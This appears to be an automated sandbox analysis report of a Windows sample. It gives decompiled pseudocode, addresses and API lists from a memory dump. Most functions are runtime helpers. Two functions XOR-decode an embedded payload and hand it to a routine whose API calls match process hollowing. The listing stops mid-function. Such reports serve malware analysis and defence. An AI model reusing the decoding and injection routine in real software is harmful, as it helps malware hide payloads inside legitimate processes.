    0x00409388
    0x00000000
    0x004093a6
    0x004093a8
    0x004093a8
    0x004093ac
    0x004093af
    0x004093b3
    0x004093b9
    0x004093bc
    0x004093bf
    0x004093c1
    0x004093c1
    0x00000000
    0x00000000
    0x00408d40
    0x00408d40
    0x00408d42
    0x00408d44
    0x00408d47
    0x00408d49
    0x00408d49
    0x00408d47
    0x00408d4b
    0x00408d4b
    0x00000000
    0x00408d4b
    0x00408cf3
    0x00408d04
    0x00408d12
    0x00408d15
    0x00000000
    0x00408d15
    0x00408cf1
    0x004093e5
    0x004093e8
    0x004093f0
    0x004093f3
    0x004093f6
    0x00409408
    0x00409408

    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 0040D920, Relevance: 6.1, APIs: 4, Instructions: 115
    C-Code - Quality: 82%
    			E0040D920(intOrPtr* __eax) {
				char _v260;
				char _v768;
				char _v772;
				intOrPtr* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if(( *(_v776 + 1) & 0x00000020) == 0) {
					E0040D7EC(0x80070057);
				}
				_t43 =  *_v776;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 =  *((intOrPtr*)(_v776 + 8));
					} else {
						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0040C9FC();
							E0040D7EC(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0040CA04();
							E0040D7EC(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E0040D8C4(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E0040D894(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0040CA0C();
						E0040D7EC(_v780);
						E0040DB18(_v792);
					}
				}
				L15:
				_push(_v776);
				L0040C598();
				return E0040D7EC(_v776);
			}






















    0x0040d92c
    0x0040d93c
    0x0040d943
    0x0040d943
    0x0040d94e
    0x0040d95c
    0x0040d96b
    0x0040d989
    0x0040d96d
    0x0040d978
    0x0040d978
    0x0040d998
    0x0040d9a4
    0x0040d9a7
    0x0040d9a9
    0x0040d9aa
    0x0040d9ac
    0x0040d9b2
    0x0040d9b4
    0x0040d9c3
    0x0040d9c4
    0x0040d9ce
    0x0040d9cf
    0x0040d9d4
    0x0040d9df
    0x0040d9e0
    0x0040d9ea
    0x0040d9eb
    0x0040d9f0
    0x0040da0b
    0x0040da0d
    0x0040da0e
    0x0040da11
    0x0040da11
    0x0040d9b2
    0x0040da1a
    0x0040da1d
    0x0040da1f
    0x0040da20
    0x0040da26
    0x0040da2c
    0x0040da2e
    0x0040da30
    0x0040da33
    0x0040da36
    0x0040da36
    0x0040da39
    0x00000000
    0x00000000
    0x00000000
    0x0040da39
    0x0040da39
    0x0040da40
    0x0040da4b
    0x0040da53
    0x0040da5a
    0x0040da61
    0x0040da62
    0x0040da67
    0x0040da72
    0x0040da72
    0x0040da80
    0x0040da84
    0x0040da8a
    0x0040da8b
    0x0040da9b

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040D9CF
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040D9EB
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DA62
    • VariantClear.OLEAUT32(?), ref: 0040DA8B
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 0040B3A0, Relevance: 6.1, APIs: 4, Instructions: 95
    C-Code - Quality: 100%
    			E0040B3A0() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x454738 = 0x409;
				 *0x45473c = 9;
				 *0x454740 = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x454738 = _t14;
				}
				if(_t14 != 0) {
					 *0x45473c = _t14 & 0x3ff;
					 *0x454740 = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x419108, 0x40b4f4, 8 << 2);
				if( *0x4190c0 != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x454745 = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x454744 = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0040B328(__eflags, _t49);
					}
				} else {
					_t20 = E0040B388();
					if(_t20 != 0) {
						 *0x454745 = 0;
						 *0x454744 = 0;
						return _t20;
					}
					E0040B328(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E00402C54(0x419108, 0x20, 0x40b4f4);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x454744 = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x454745 = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x454738; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x454745 = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}



















    0x0040b3ac
    0x0040b3b6
    0x0040b3c0
    0x0040b3ca
    0x0040b3d1
    0x0040b3d3
    0x0040b3d3
    0x0040b3db
    0x0040b3e7
    0x0040b3f3
    0x0040b3f3
    0x0040b407
    0x0040b410
    0x0040b4bf
    0x0040b4c4
    0x0040b4c9
    0x0040b4d0
    0x0040b4d5
    0x0040b4d7
    0x0040b4da
    0x0040b4e0
    0x0040b4e2
    0x00000000
    0x0040b4ea
    0x0040b416
    0x0040b416
    0x0040b41d
    0x0040b41f
    0x0040b426
    0x00000000
    0x0040b426
    0x0040b433
    0x0040b443
    0x0040b445
    0x0040b44a
    0x0040b44d
    0x0040b453
    0x0040b455
    0x0040b457
    0x00000000
    0x0040b457
    0x0040b463
    0x0040b468
    0x0040b46e
    0x0040b46e
    0x0040b470
    0x0040b471
    0x0040b472
    0x0040b472
    0x0040b48e
    0x0040b494
    0x0040b499
    0x0040b49e
    0x0040b4a4
    0x0040b4a4
    0x0040b4a8
    0x0040b4ab
    0x0040b4b1
    0x0040b4b3
    0x00000000
    0x00000000
    0x0040b4b5
    0x0040b4b8
    0x0040b4b8
    0x0040b4b9
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040b4b9
    0x0040b4a4
    0x0040b4f1
    0x0040b4f1
    0x00000000

    APIs
    • GetThreadLocale.KERNEL32 ref: 0040B3CA
    • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
    • GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
    • GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 0040B328: GetCPInfo.KERNEL32(00000000,?), ref: 0040B341
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 0040152C, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 45
    C-Code - Quality: 100%
    			E0040152C(void* __eax, void** __ecx, void* __edx) {
				void* _t4;
				void** _t9;
				void* _t13;
				void* _t14;
				long _t16;
				void* _t17;

				_t9 = __ecx;
				_t14 = __edx;
				_t17 = __eax;
				 *(__ecx + 4) = 0x100000;
				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
				_t13 = _t4;
				 *_t9 = _t13;
				if(_t13 == 0) {
					_t16 = _t14 + 0x0000ffff & 0xffff0000;
					_t9[1] = _t16;
					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
					 *_t9 = _t4;
				}
				if( *_t9 != 0) {
					_t4 = E0040137C(0x4545e4, _t9);
					if(_t4 == 0) {
						VirtualFree( *_t9, 0, 0x8000);
						 *_t9 = 0;
						return 0;
					}
				}
				return _t4;
			}









    0x00401530
    0x00401532
    0x00401534
    0x00401536
    0x0040154a
    0x0040154f
    0x00401551
    0x00401555
    0x0040155d
    0x00401563
    0x0040156f
    0x00401574
    0x00401574
    0x00401579
    0x00401582
    0x00401589
    0x00401595
    0x0040159c
    0x00000000
    0x0040159c
    0x00401589
    0x004015a2

    APIs
    • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040154A
    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040156F
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 00401595
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 00405E00, Relevance: 6.0, APIs: 4, Instructions: 11
    C-Code - Quality: 100%
    			E00405E00(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}





    0x00405e03
    0x00405e0a
    0x00405e0f
    0x00405e15
    0x00405e1a

    APIs
    • GlobalHandle.KERNEL32 ref: 00405E03
    • GlobalUnWire.KERNEL32(00000000), ref: 00405E0A
    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00405E0F
    • GlobalFix.KERNEL32(00000000), ref: 00405E15
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 00408B80, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74
    C-Code - Quality: 72%
    			E00408B80(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				char* _t32;
				intOrPtr* _t49;
				intOrPtr _t58;
				void* _t63;
				void* _t67;

				_v8 = 0;
				_t49 = __edx;
				_t63 = __eax;
				_push(_t67);
				_push(0x408c5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffeec;
				E00403E88(__edx);
				_v24 =  *((intOrPtr*)(_a4 - 0xe));
				_v22 =  *((intOrPtr*)(_a4 - 0x10));
				_v18 =  *((intOrPtr*)(_a4 - 0x12));
				if(_t63 > 2) {
					E00403F20( &_v8, 0x408c80);
				} else {
					E00403F20( &_v8, 0x408c74);
				}
				_t32 = E00404348(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
					E004040F8(_t49, 0x100,  &_v280);
					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
						E004043A8( *_t49, E00404148( *_t49) - 1, 2, _t49);
					}
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(E00408C65);
				return E00403E88( &_v8);
			}













    0x00408b8d
    0x00408b90
    0x00408b92
    0x00408b96
    0x00408b97
    0x00408b9c
    0x00408b9f
    0x00408ba4
    0x00408bb0
    0x00408bbb
    0x00408bc6
    0x00408bcd
    0x00408be6
    0x00408bcf
    0x00408bd7
    0x00408bd7
    0x00408bfa
    0x00408c13
    0x00408c22
    0x00408c28
    0x00408c43
    0x00408c43
    0x00408c28
    0x00408c4a
    0x00408c4d
    0x00408c50
    0x00408c5d

    APIs
    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00408C5E), ref: 00408C06
    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 00408C0C
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 0041844E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
    C-Code - Quality: 50%
    			E0041844E() {
				struct _SYSTEM_INFO _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr* _t15;
				void* _t31;
				signed int _t34;
				void* _t38;
				void* _t39;
				void* _t45;
				void* _t51;

				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_push(_t45);
				_push(0x418517);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45 + 0xffffffd0;
				GetSystemInfo( &_v40);
				_t34 = 0;
				_t31 = 0x39a91;
				_t15 = 0x41944c;
				do {
					if(_t34 == 0x20) {
						_t34 = 0;
					}
					_t5 = (_t34 & 0x000000ff) + 0x452ee0; // 0x8845645c
					_t30 = ( *_t15 - _t34 ^  *_t5) + _t34;
					 *_t15 = ( *_t15 - _t34 ^  *_t5) + _t34;
					_t34 = _t34 + 1;
					_t15 = _t15 + 1;
					_t31 = _t31 - 1;
				} while (_t31 != 0);
				L5:
				_push("h`JE");
				_push("-t ");
				_push(0);
				E004070E8( &_v48, _t51, _v40.dwNumberOfProcessors >> 1);
				_push(_v48);
				_push(0x41853c);
				_push( *0x454a5c);
				E00404208();
				_push(_v44);
				E004029A4(0,  &_v52);
				_pop(_t38);
				E00417F5C(_v52, _t30, 0x41944c, _t38, _t39, _t42, _t51);
				goto L5;
			}














    0x0041845a
    0x0041845d
    0x00418460
    0x00418465
    0x00418466
    0x0041846b
    0x0041846e
    0x00418475
    0x0041847a
    0x0041847c
    0x00418481
    0x00418486
    0x00418489
    0x0041848b
    0x0041848b
    0x00418499
    0x0041849f
    0x004184a1
    0x004184a3
    0x004184a4
    0x004184a5
    0x004184a5
    0x004184a8
    0x004184a8
    0x004184ad
    0x004184b9
    0x004184be
    0x004184c3
    0x004184c6
    0x004184cb
    0x004184d9
    0x004184e1
    0x004184e7
    0x004184f4
    0x004184f5
    0x00000000

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 00418450, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59
    C-Code - Quality: 53%
    			E00418450() {
				struct _SYSTEM_INFO _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr* _t15;
				void* _t30;
				signed int _t33;
				void* _t37;
				void* _t38;
				intOrPtr _t42;
				void* _t47;

				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_push(0x418517);
				_push( *[fs:eax]);
				 *[fs:eax] = _t42;
				GetSystemInfo( &_v40);
				_t33 = 0;
				_t30 = 0x39a91;
				_t15 = 0x41944c;
				do {
					if(_t33 == 0x20) {
						_t33 = 0;
					}
					_t5 = (_t33 & 0x000000ff) + 0x452ee0; // 0x8845645c
					_t29 = ( *_t15 - _t33 ^  *_t5) + _t33;
					 *_t15 = ( *_t15 - _t33 ^  *_t5) + _t33;
					_t33 = _t33 + 1;
					_t15 = _t15 + 1;
					_t30 = _t30 - 1;
				} while (_t30 != 0);
				L4:
				_push("h`JE");
				_push("-t ");
				_push(0);
				E004070E8( &_v48, _t47, _v40.dwNumberOfProcessors >> 1);
				_push(_v48);
				_push(0x41853c);
				_push( *0x454a5c);
				E00404208();
				_push(_v44);
				E004029A4(0,  &_v52);
				_pop(_t37);
				E00417F5C(_v52, _t29, 0x41944c, _t37, _t38, _t40, _t47);
				goto L4;
			}














    0x0041845a
    0x0041845d
    0x00418460
    0x00418466
    0x0041846b
    0x0041846e
    0x00418475
    0x0041847a
    0x0041847c
    0x00418481
    0x00418486
    0x00418489
    0x0041848b
    0x0041848b
    0x00418499
    0x0041849f
    0x004184a1
    0x004184a3
    0x004184a4
    0x004184a5
    0x004184a5
    0x004184a8
    0x004184a8
    0x004184ad
    0x004184b9
    0x004184be
    0x004184c3
    0x004184c6
    0x004184cb
    0x004184d9
    0x004184e1
    0x004184e7
    0x004184f4
    0x004184f5
    0x00000000

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 0040BC54, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
    C-Code - Quality: 83%
    			E0040BC54(void* __edx) {
				void* _t6;
				void* _t13;
				void* _t17;
				void* _t20;
				void* _t21;
				void* _t22;

				_t17 = __edx;
				if(__edx != 0) {
					_t22 = _t22 + 0xfffffff0;
					_t6 = E00403404(_t6, _t21);
				}
				_t20 = _t6;
				E004030E4(0);
				 *((intOrPtr*)(_t20 + 0xc)) = 0xffff;
				 *((intOrPtr*)(_t20 + 0x10)) = CreateEventA(0, 0xffffffff, 0xffffffff, 0);
				 *((intOrPtr*)(_t20 + 0x14)) = CreateEventA(0, 0, 0, 0);
				 *(_t20 + 0x18) = 0xffffffff;
				 *((intOrPtr*)(_t20 + 0x20)) = E004030E4(1);
				_t13 = _t20;
				if(_t17 != 0) {
					E0040345C(_t13);
					_pop( *[fs:0x0]);
				}
				return _t20;
			}









    0x0040bc54
    0x0040bc58
    0x0040bc5a
    0x0040bc5d
    0x0040bc5d
    0x0040bc64
    0x0040bc6a
    0x0040bc6f
    0x0040bc83
    0x0040bc93
    0x0040bc96
    0x0040bca9
    0x0040bcac
    0x0040bcb0
    0x0040bcb2
    0x0040bcb7
    0x0040bcbe
    0x0040bcc5

    APIs
    • CreateEventA.KERNEL32(00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC7E
    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC8E
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 004179B4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9
    C-Code - Quality: 100%
    			E004179B4(void* __eax) {
				void* _t3;

				L0040C518();
				if(__eax != 0) {
					_t3 = E0040A56C("WSACleanup", 1);
					E0040386C();
					return _t3;
				}
				return __eax;
			}




    0x004179b4
    0x004179bb
    0x004179c9
    0x004179ce
    0x00000000
    0x004179ce
    0x004179d3

    APIs
    • WSACleanup.WSOCK32(00417A06,00000000,00417A14), ref: 004179B4
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 0040F0A8, Relevance: 5.1, Strings: 4, Instructions: 85
    C-Code - Quality: 78%
    			E0040F0A8(signed int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				void* _v8;
				char _v264;
				char _v520;
				char _v524;
				signed char _t47;
				intOrPtr* _t59;
				intOrPtr _t61;
				intOrPtr* _t75;
				void* _t78;

				_v524 = 0;
				_t75 = __edx;
				_t47 = __eax;
				_push(_t78);
				_push(0x40f1ce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t78 + 0xfffffdf8;
				_t73 = __eax & 0x00000fff;
				if((__eax & 0x00000fff) > 0x14) {
					if(__eax != 0x100) {
						if(__eax != 0x101) {
							if(E0040F504(__eax,  &_v8) == 0) {
								E00407110( &_v524, 4);
								_t59 =  *0x4530ec; // 0x419128
								E00404194(_t75, _v524,  *_t59);
							} else {
								E00403064( *_v8,  &_v520);
								E004027B4( &_v520, 0x7fffffff, 2,  &_v264);
								E004040EC(__edx,  &_v264);
							}
						} else {
							E00403EDC(__edx, 0x40f1f4);
						}
					} else {
						E00403EDC(__edx, "String");
					}
				} else {
					E00403EDC(__edx,  *((intOrPtr*)(0x419358 + (_t73 & 0x0000ffff) * 4)));
				}
				if((_t47 & 0x00000020) != 0) {
					E00404194(_t75,  *_t75, "Array ");
				}
				if((_t47 & 0x00000040) != 0) {
					E00404194(_t75,  *_t75, "ByRef ");
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0040F1D5);
				return E00403E88( &_v524);
			}












    0x0040f0b6
    0x0040f0bc
    0x0040f0be
    0x0040f0c2
    0x0040f0c3
    0x0040f0c8
    0x0040f0cb
    0x0040f0d0
    0x0040f0d9
    0x0040f0f6
    0x0040f10e
    0x0040f12a
    0x0040f175
    0x0040f180
    0x0040f18a
    0x0040f12c
    0x0040f13e
    0x0040f153
    0x0040f160
    0x0040f160
    0x0040f110
    0x0040f117
    0x0040f117
    0x0040f0f8
    0x0040f0ff
    0x0040f0ff
    0x0040f0db
    0x0040f0e7
    0x0040f0e7
    0x0040f192
    0x0040f19d
    0x0040f19d
    0x0040f1a5
    0x0040f1b0
    0x0040f1b0
    0x0040f1b7
    0x0040f1ba
    0x0040f1bd
    0x0040f1cd

    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 0041381C, Relevance: 5.1, Strings: 4, Instructions: 71
    C-Code - Quality: 82%
    			E0041381C(intOrPtr __eax, void* __ebx, char* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char* _t15;
				char* _t23;
				intOrPtr _t30;
				char _t31;
				intOrPtr _t39;
				intOrPtr _t42;
				void* _t45;

				_v12 = 0;
				_t23 = __edx;
				_push(_t45);
				_push(0x4138c2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45 + 0xfffffff8;
				_v8 = 0;
				if(__edx != 0) {
					_t39 = __eax;
					while( *_t23 != 0) {
						_t15 = _t23;
						while(1) {
							_t31 =  *_t23;
							if(_t31 == 0 || _t31 + 0xd3 - 2 < 0) {
								break;
							}
							_t23 = _t23 + 1;
						}
						E00403F78( &_v12, _t23 - _t15, _t15);
						_t42 = E004165D4(_t39, _t23 - _t15, _v12);
						if(_t42 == 0 && E00406E50(_v12, 0x4138dc) != 0) {
							_t42 = _t39;
						}
						if(_t42 != 0) {
							if( *_t23 == 0x2e) {
								_t23 = _t23 + 1;
							}
							if( *_t23 == 0x2d) {
								_t23 = _t23 + 1;
							}
							if( *_t23 == 0x3e) {
								_t23 = _t23 + 1;
							}
							_t39 = _t42;
							continue;
						}
						goto L19;
					}
